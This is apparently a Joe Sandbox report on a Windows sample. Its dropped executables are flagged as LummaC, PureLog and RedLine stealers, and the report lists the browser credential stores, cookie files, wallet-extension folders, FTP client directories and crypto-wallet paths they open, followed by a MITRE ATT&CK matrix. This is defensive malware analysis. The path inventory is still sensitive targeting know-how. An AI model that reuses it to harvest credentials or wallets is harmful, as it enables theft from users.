Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\formhistory.sqlite
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\AppData\Local\Temp\1073896001\ViGgA8C.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\key4.db
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\logins.json
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\AppData\Local\Temp\1073896001\ViGgA8C.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\1073896001\ViGgA8C.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\AppData\Local\Temp\1073896001\ViGgA8C.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1073896001\ViGgA8C.exe	File opened: C:\Users\user\AppData\Roaming\atomic\
Source: C:\Users\user\AppData\Local\Temp\1073896001\ViGgA8C.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\Temp\1073896001\ViGgA8C.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\Temp\1073896001\ViGgA8C.exe	File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
Source: C:\Users\user\AppData\Local\Temp\1073896001\ViGgA8C.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Users\user\AppData\Local\Temp\1073896001\ViGgA8C.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\1073896001\ViGgA8C.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\1073896001\ViGgA8C.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\
Source: C:\Users\user\AppData\Local\Temp\1073896001\ViGgA8C.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\

Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Directory queried: C:\Users\user\Documents\SQRKHNBNYN
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Directory queried: C:\Users\user\Documents\SQRKHNBNYN

Source: Yara match	File source: 61.2.ViGgA8C.exe.f20000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000003D.00000003.79070089758.0000000005190000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003D.00000002.79562208043.0000000000F22000.00000040.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Ryu8yUx.exe PID: 2412, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: 13.2.Ryu8yUx.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.Ryu8yUx.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.Ryu8yUx.exe.3b79550.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.78962753509.0000000003B79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.79064100946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Yara detected PureLog Stealer

Source: Yara match	File source: 12.0.Ryu8yUx.exe.6a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.Ryu8yUx.exe.3b79550.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.Ryu8yUx.exe.3b79550.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.78962753509.0000000003B79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000000.78919175290.00000000006A2000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\7LE4YNMI\Ryu8yUx[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe, type: DROPPED

Yara detected RedLine Stealer

Source: Yara match	File source: 61.2.ViGgA8C.exe.f20000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000003D.00000003.79070089758.0000000005190000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003D.00000002.79562208043.0000000000F22000.00000040.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 0000003D.00000002.79568618029.0000000005630000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	11 Scripting	Valid Accounts	231 Windows Management Instrumentation	11 Scripting	1 Abuse Elevation Control Mechanism	11 Disable or Modify Tools	2 OS Credential Dumping	1 System Time Discovery	Remote Services	11 Archive Collected Data	2 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	1 DLL Side-Loading	1 DLL Side-Loading	11 Deobfuscate/Decode Files or Information	LSASS Memory	13 File and Directory Discovery	Remote Desktop Protocol	41 Data from Local System	1 Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	22 Command and Scripting Interpreter	1 Windows Service	1 Access Token Manipulation	1 Abuse Elevation Control Mechanism	Security Account Manager	136 System Information Discovery	SMB/Windows Admin Shares	1 Screen Capture	Steganography	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	1 Windows Service	51 Obfuscated Files or Information	NTDS	991 Security Software Discovery	Distributed Component Object Model	2 Clipboard Data	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	1 Service Execution	121 Registry Run Keys / Startup Folder	713 Process Injection	32 Software Packing	LSA Secrets	2 Process Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	1 PowerShell	RC Scripts	1 Scheduled Task/Job	1 Timestomp	Cached Domain Credentials	571 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	121 Registry Run Keys / Startup Folder	1 DLL Side-Loading	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 File Deletion	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	11 Masquerading	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	571 Virtualization/Sandbox Evasion	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	1 Access Token Manipulation	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption
Gather Victim Org Information	DNS Server	Compromise Software Supply Chain	Windows Command Shell	Scheduled Task	Scheduled Task	713 Process Injection	Keylogging	Process Discovery	Taint Shared Content	Screen Capture	DNS	Exfiltration Over Physical Medium	Resource Hijacking

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Mc3FDUMnVz.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: RedLine

Threatname: Amadey

Threatname: LummaC

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Other

Sigma Signatures

Change of critical system settings

System Summary

Data Obfuscation

HIPS / PFW / Operating System Protection Evasion

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Change of critical system settings

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
Mc3FDUMnVz.exe